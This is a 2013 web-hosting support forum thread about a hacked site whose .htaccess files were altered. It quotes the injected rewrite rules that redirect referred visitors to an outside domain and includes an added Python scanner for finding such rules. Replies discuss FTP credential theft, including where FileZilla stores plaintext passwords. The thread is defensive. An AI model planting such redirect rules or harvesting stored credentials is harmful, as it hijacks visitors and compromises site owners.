GetSimple Support Forum
My site hacked: suspicious additions to .htaccess file - Printable Version




My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-06

hi all

My website
http://cycling-jersey-collection.com/

stopped working overnight, and after looking at the files on the server there were .htaccess files in every directory.

Here's some of the code that was in the .htaccess files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://medlab-pdm.de/mchd.html?h=1393979 [L,R]
</IfModule>

I have now removed them all, and have re-uploaded my "proper" .htaccess file too.

Has anybody else encountered this, and do any of you have any suggestions to stop it happening again?

Many thanks

Andy
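
Added example, not part of the original post: a Python sketch that walks a downloaded copy of the webroot and reports every .htaccess whose RewriteRule targets an absolute URL on a host other than your own, noting whether the rule is gated on HTTP_REFERER as in the snippet above. The host names, directory layout and sample file bodies are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

COND_RE = re.compile(r'^\s*RewriteCond\s+(\S+)', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)

def scan_htaccess(text, own_hosts):
    """Flag RewriteRules whose target is an absolute URL on a foreign host
    (mod_rewrite turns such a target into an external redirect)."""
    findings, conds = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:                      # conditions attach to the next RewriteRule
            conds.append(cond.group(1).upper())
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        host = (urlparse(rule.group(1)).hostname or "").lower()
        if host and host not in own_hosts:
            findings.append({"line": lineno, "host": host,
                             "referer_gated": any("HTTP_REFERER" in c for c in conds)})
        conds = []
    return findings

def scan_tree(root, own_hosts):
    # Returns {path relative to root: findings} for every .htaccess with hits.
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_htaccess(fh.read(), own_hosts)
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

# Constructed samples: a normal CMS rule and an injected referer-gated redirect.
CLEAN = "RewriteEngine On\nRewriteRule ^([A-Za-z0-9_-]+)/?$ index.php?id=$1 [QSA,L]\n"
INJECTED = ("<IfModule mod_rewrite.c>\nRewriteEngine On\n"
            "RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)\n"
            "RewriteRule ^.*$ http://redirect.example/landing.html [L,R]\n</IfModule>\n")

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "data", "uploads"))
        for rel, body in ((".htaccess", CLEAN), ("data/uploads/.htaccess", INJECTED)):
            with open(os.path.join(root, *rel.split("/")), "w") as fh:
                fh.write(body)
        return scan_tree(root, {"www.site.example", "site.example"})
```

Calling scan_tree() on a real copy of the site with your own host names lists the files to delete or restore; any .htaccess it reports in a directory where you never placed one is worth checking against the FTP and access logs for its modification time.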


RE: My site hacked: suspicious additions to .htaccess file - Timbow - 2013-02-06

Your site is not fixed
Redirected to this.
Redirecting to google now


RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-06

Get copies of your accesslogs ASAP.


RE: My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-06

somehow they accessed the site via ftp despite me having a long, non-english word password with caps and numbers!

I've now blocked both IP addresses at the firewall.


RE: My site hacked: suspicious additions to .htaccess file - Connie - 2013-02-07

andy,

did you contact your hoster? They should protect the systems better...


RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

(2013-02-06, 22:11:55)andy.storey Wrote: Has anybody else encountered this, and do any of you have any suggestions to stop it happening again?

If you store unencrypted passwords in the FTP app you use, infection might happen again. The same goes for all other users who also have FTP accounts and store them unencrypted. Their computers might be infected with a virus.

I suggest changing FTP passwords ASAP, and encrypting them or not storing them at all. The same goes for the main hosting account pass, if it's also used to connect to FTP.

Of course infection could happen through a security hole in another webapp or its plugin.


RE: My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-07

thanks yojoe

i've changed the cPanel and ftp passwords to 2 different passwords.

I've also changed FTP programmes (was using filezilla) and will no longer "Save Passwords" in the new FTP prog.

a.


RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to useful scanners on this page: http://www.itsecurity.com/features/free-online-antivirus-tools-101207/


RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 00:29:19)Connie Wrote: andy,

did you contact your hoster? They should protect the systems better...

Oh yeah because a user using insecure software on this computer and getting compromised is really the fault of the hosting company?


RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 03:33:29)yojoe Wrote: saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to useful scanners on this page: http://www.itsecurity.com/features/free-online-antivirus-tools-101207/

This.
I highly recommend you scan the computer with Malwarebytes Anti-Malware Free Edition. It's a great scanner (not proactive anti-virus protection)...


RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-07

What's wrong with FileZilla? Surely it safely stores passwords. No?


RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 12:49:36)shawn_a Wrote: What's wrong with FileZilla? Surely it safely stores passwords. No?

Stored in plaintext!
Go to C:\Users\Michel\AppData\Roaming\FileZilla in Windows, open recentservers.xml and sitemanager.xml: all of your usernames, passwords, hostnames, IPs, etc. are in there, unencrypted!


RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-07

ooh


RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

shawn: FileZilla never had a way to encrypt stored passwords, thus I always advised against using it.
I suggest using unreal commander (with a free licence) as it allows you to encrypt with main pass or with systemID and main pass. There's also "freecommander" but I haven't tested its FTP capabilities.

btw. infections through FTP happen pretty often.
At least browsers and search engines warn visitors when they enter an infected website.


RE: My site hacked: suspicious additions to .htaccess file - rezfill - 2013-02-15

So far I can only suspect that FTP passwords were somehow intercepted and suggest that you use SFTP instead of FTP if your hosting plan provides SFTP access.